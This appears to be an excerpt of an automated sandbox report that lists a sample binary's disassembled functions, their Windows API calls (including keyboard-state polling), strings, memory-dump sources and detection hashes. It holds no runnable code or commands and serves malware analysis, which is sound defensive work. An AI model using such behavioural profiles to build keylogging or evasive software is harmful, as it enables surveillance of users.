                                                                                                                                                                  • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                  • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                                  • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                  • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                                  Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                                                  • DeleteObject.GDI32(00410000), ref: 00470A04
                                                                                                                                                                  • DestroyIcon.USER32(0045004D), ref: 00470A1C
                                                                                                                                                                  • DeleteObject.GDI32(755974B9), ref: 00470A34
                                                                                                                                                                  • DestroyWindow.USER32(033100C0), ref: 00470A4C
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                                                  • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1237572874-0
                                                                                                                                                                  • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                  • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                                  Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                  • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                                  • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                                  Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                                  Function 004649A3 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Directory$CurrentSystem
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 1285235121-2746444292
                                                                                                                                                                  • Opcode ID: 9b4cf855a936d5ed6ac81c3285cf271eda9b49c9fbd033c9cd62006e947bd3db
                                                                                                                                                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b4cf855a936d5ed6ac81c3285cf271eda9b49c9fbd033c9cd62006e947bd3db
                                                                                                                                                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                                                  Function 0046CB5F Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                  • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                  Strings
                                                                                                                                                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask
                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                  • API String ID: 3724026681-2785691316
                                                                                                                                                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                                                  Function 00461014 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                                                                  • String ID: ThumbnailClass
                                                                                                                                                                  • API String ID: 3725905772-1241985126
                                                                                                                                                                  • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                  • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                                  • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                  • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                                  Function 0045CD1E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 215COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                  Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize
                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                  • API String ID: 1482215665-1287834457
                                                                                                                                                                  • Opcode ID: 7405bbcb34cbaf548febba9aa03c13379610a97bf21ecf7495a5e9ca82ea5d70
                                                                                                                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                  • Opcode Fuzzy Hash: 7405bbcb34cbaf548febba9aa03c13379610a97bf21ecf7495a5e9ca82ea5d70
                                                                                                                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                  Function 00433A13 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 196COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00433A26
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00433A4E
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 2179348866-1459072770
                                                                                                                                                                  • Opcode ID: 586ca05a8aad0178944232983c5d24005a3e3eb9d477e0a78306c7d1d137b8f0
                                                                                                                                                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                                                  • Opcode Fuzzy Hash: 586ca05a8aad0178944232983c5d24005a3e3eb9d477e0a78306c7d1d137b8f0
                                                                                                                                                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                                                  Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                  • API String ID: 2483343779-2107944366
